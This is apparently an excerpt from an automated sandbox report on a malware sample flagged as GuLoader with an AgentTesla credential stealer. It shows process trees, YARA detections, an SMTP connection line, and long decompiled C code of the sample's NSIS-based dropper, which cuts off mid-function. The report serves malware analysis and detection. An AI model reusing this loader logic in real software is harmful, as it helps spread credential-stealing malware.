Jul 8, 2022 06:01:51.500355959 CEST	587	49749	185.101.224.45	192.168.11.20	220 TLS go ahead

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exePID: 8772, Parent PID: 7936

General

Target ID:	0
Start time:	06:00:58
Start date:	08/07/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
Imagebase:	0x400000
File size:	471150 bytes
MD5 hash:	6164A2F75A0C585D3256FAECAC344573
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 3216, Parent PID: 8772

General

Target ID:	3
Start time:	06:01:19
Start date:	08/07/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
Imagebase:	0x600000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 4372, Parent PID: 8772

General

Target ID:	4
Start time:	06:01:19
Start date:	08/07/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
Imagebase:	0xfb0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.900199931.0000000001390000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3160, Parent PID: 4372

General

Target ID:	5
Start time:	06:01:20
Start date:	08/07/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff783f90000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exePID: 8772, Parent PID: 7936COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	14%
Signature Coverage:	25.5%
Total number of Nodes:	1221
Total number of Limit Nodes:	53

Executed Functions

Function 0040352D Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ";
				E0040653D(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00440002;
				}
				_t199 = CharNextW(E00405E39(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ") {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Arthur\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne", _t220);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne", _t222);
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne\\BLATTARIAE\\Proprietrix\\Natick", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040353b
0x0040353c
0x00403543
0x00403546
0x0040354d
0x00403550
0x00403563
0x00403569
0x0040356c
0x0040356f
0x0040357d
0x00403585
0x00403590
0x004035a9
0x004035ab
0x004035b3
0x004035b3
0x004035be
0x004035c0
0x004035c0
0x004035d5
0x004035fa
0x00403608
0x0040360b
0x00403612
0x00403619
0x00403619
0x00403612
0x0040361b
0x00403620
0x00403621
0x0040362d
0x00403631
0x00403638
0x00403646
0x0040364b
0x00403652
0x00403656
0x0040365a
0x0040365c
0x0040365c
0x0040365a
0x00403663
0x0040366a
0x00403670
0x00403688
0x00403698
0x0040369d
0x004036a3
0x004036aa
0x004036b1
0x004036b3
0x004036b4
0x004036be
0x004036c5
0x004036c7
0x004036c9
0x004036c9
0x004036dc
0x004036de
0x004037d8
0x004037d8
0x004037db
0x004037de
0x00000000
0x00000000
0x004036e8
0x004036e9
0x004036ec
0x004036f5
0x004036f5
0x004036f8
0x004036fb
0x004036fe
0x00403701
0x00403701
0x00403701
0x00403702
0x00403706
0x004037c6
0x004037cf
0x004037d1
0x004037d4
0x004037d7
0x004037d7
0x004037d7
0x00000000
0x0040370c
0x0040370d
0x0040370e
0x00403712
0x0040372c
0x00403733
0x00403746
0x00403747
0x0040375c
0x00403761
0x00403763
0x00403765
0x00403781
0x00403788
0x0040379b
0x0040379c
0x004037b1
0x004037b7
0x004037b9
0x004037bb
0x004037c3
0x004037c5
0x00000000
0x004037c5
0x004037bf
0x004037c1
0x004037e6
0x004037ea
0x004037f3
0x004037f8
0x004037fe
0x00403809
0x0040380b
0x00403810
0x00403812
0x0040386a
0x0040386f
0x00403878
0x0040387f
0x00403882
0x00403a59
0x00403a59
0x00403a5e
0x00403a67
0x00403a84
0x00403afc
0x00403afc
0x00403b04
0x00403b06
0x00403b06
0x00403b0c
0x00403b0c
0x00403a9b
0x00403aa7
0x00403ab8
0x00403abf
0x00403ac6
0x00403ac6
0x00403ace
0x00403ada
0x00403ae8
0x00403af3
0x00000000
0x00000000
0x00000000
0x00403adc
0x00403adc
0x00403add
0x00403adf
0x00403ae0
0x00403ae1
0x00403ae6
0x00403af5
0x00403af7
0x00000000
0x00403af7
0x00000000
0x00403ae6
0x00403ada
0x00403a71
0x00403a78
0x00403a78
0x0040388e
0x00403935
0x00403935
0x00403941
0x00000000
0x00403941
0x0040389f
0x004038a7
0x004038f9
0x004038f9
0x004038ff
0x00403906
0x00403954
0x00403956
0x0040395b
0x0040395d
0x00403965
0x00403965
0x00403970
0x00403975
0x0040397c
0x00403982
0x00403984
0x00403a57
0x00403a57
0x00403a57
0x00000000
0x0040398a
0x0040398a
0x0040398c
0x0040398d
0x00403996
0x0040398f
0x0040398f
0x0040398f
0x0040399c
0x004039a4
0x004039ab
0x004039b3
0x004039b3
0x004039c0
0x004039cc
0x004039d6
0x004039d6
0x004039d8
0x004039df
0x004039e9
0x004039f5
0x004039fb
0x00403a01
0x00403a04
0x00403a0e
0x00403a14
0x00403a16
0x00403a1a
0x00403a2b
0x00403a31
0x00403a36
0x00403a38
0x00403a3b
0x00403a41
0x00403a41
0x00403a38
0x00403a16
0x00403a44
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a52
0x00000000
0x00403a52
0x00403984
0x00403908
0x0040390b
0x0040390f
0x00403914
0x00403916
0x00000000
0x00000000
0x00403922
0x0040392d
0x00403932
0x00000000
0x00403932
0x004038b0
0x004038c8
0x004038d9
0x004038da
0x004038de
0x004038e0
0x004038ee
0x004038f5
0x00000000
0x00000000
0x00000000
0x004038f5
0x004038f7
0x00000000
0x004038f7
0x0040381a
0x00403826
0x0040382b
0x00403830
0x00403832
0x00000000
0x00000000
0x0040383a
0x00403842
0x00403853
0x0040385b
0x0040385d
0x00403862
0x00403864
0x00000000
0x00000000
0x00000000
0x00403864
0x00000000
0x004037c1
0x0040376a
0x0040376c
0x00000000
0x00000000
0x0040376e
0x00403772
0x00403776
0x0040377d
0x0040377d
0x0040377d
0x0040377d
0x00000000
0x0040377d
0x00403778
0x0040377b
0x00000000
0x00000000
0x00000000
0x0040377b
0x00403714
0x00403718
0x0040371b
0x00403722
0x00403722
0x00000000
0x00403722
0x0040371d
0x00403720
0x00000000
0x00000000
0x00000000
0x00403720
0x00000000
0x00000000
0x00000000
0x004036ee
0x004036ee
0x004036ef
0x004036f0
0x004036f0
0x00000000
0x004036ee
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" ,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" ,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

Error launching installer, xrefs: 004038FF
SeShutdownPrivilege, xrefs: 00403AA1
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" , xrefs: 004036A3, 004036A9, 004036BE, 00403895, 004038A1, 004038EF, 004038F9
1033, xrefs: 0040386A
.tmp, xrefs: 0040396A
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
Low, xrefs: 0040383C
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne, xrefs: 004037EE, 0040391D, 004039A4, 004039AE
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick, xrefs: 00403928
TEMP, xrefs: 0040384E
C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, xrefs: 00403A09
NSIS Error, xrefs: 0040368E
\Temp, xrefs: 00403820
C:\Users\user\Desktop, xrefs: 00403975, 0040397A, 004039AD
~nsu, xrefs: 0040394E
UXTHEME, xrefs: 0040361B, 00403620, 00403626
TMP, xrefs: 00403856

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-662482875
Opcode ID: d3ac852d0b07270a8ac6404b04f3782bfa607aa33a644488edfe9f48175efda3
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: d3ac852d0b07270a8ac6404b04f3782bfa607aa33a644488edfe9f48175efda3
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4; // 0x1041e
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
